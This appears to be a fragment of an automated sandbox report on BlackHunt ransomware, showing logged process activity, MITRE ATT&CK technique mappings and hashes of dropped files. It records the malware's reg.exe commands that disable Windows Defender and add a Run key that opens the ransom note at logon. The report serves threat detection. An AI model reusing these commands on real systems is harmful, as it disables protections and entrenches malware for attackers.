C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:3632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 15240 -ip 152401⤵PID:9512
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ad1feebcb85f6123e6281f2d03e44932
SHA100295f3253b15f567cebf21ef220c4b318d79005
SHA2569d94a6f6a8c221c6c03db52f178f3c2bb0ec2cc6d6dfda04c53f50e485063c31
SHA512d1b3d7fbe125660060fde265cf64aeed76112fadb82beeb1f8b0f2ed3f9813344705391636535cdbda4b726d241feb7bf85d73b324335d55748d885d9adc4418
-
Filesize
1KB
MD548819d2b8526e42f54b4bc7d608bfd17
SHA1669170da33e4f236bcee310893124eb62d9676de
SHA2562e0698b572f03f2e414856ebb9a54ecad7d9dbece2303f696ae7045cfe6318c6
SHA5125b61f936c5d4479e245ea5cea1afe68772effcd7ce39487e1f7ff9682255bd9737942b0603d79497c6df57772a15194a9ef94588d0b24d3e77fe564830ab0e14
-
Filesize
12KB
MD589a853122014984463e3ef712c67f079
SHA1cde99e67663c458a508703e9dcc3d5fe569d0ccf
SHA2564eb11fbca2066d3a717020e12c41d3c06306ad3e3876a2fc76cd5866846c1887
SHA51232579b6ddf4f7c878ea10bad3b921c76a3fbd07159ee8656a974e040da188a767274f2ec028ab24918b05e793c4d0e9190958d9974971a68949c142836def7bf
-
Filesize
684B
MD540c46bd044ae22dbcddc933ea1e0f774
SHA17d27eda7fa1370d1552d8873e0f09e6361999ddd
SHA256f3f7412bfbad866a11b722ec254cf180470a23e3fcd96bdb3bdd939884f9a3e3
SHA512d3090af130b5fd7f2486c199f2ebf77fb61603db0b36a66507f8dc84bbfb16999b6762614e99eaab769841653752ae463979e24a01cde218063ada0e1197bc48